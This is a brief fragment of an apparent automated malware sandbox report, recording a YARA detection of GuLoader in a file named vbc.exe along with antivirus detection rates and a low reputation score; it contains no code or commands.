                      • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                      Antivirus matches:
                      • Detection: 42%, Virustotal, Browse
                      • Detection: 14%, Metadefender, Browse
                      • Detection: 31%, ReversingLabs
                      Reputation:low

                      Disassembly

                      Code Analysis

                      Reset < >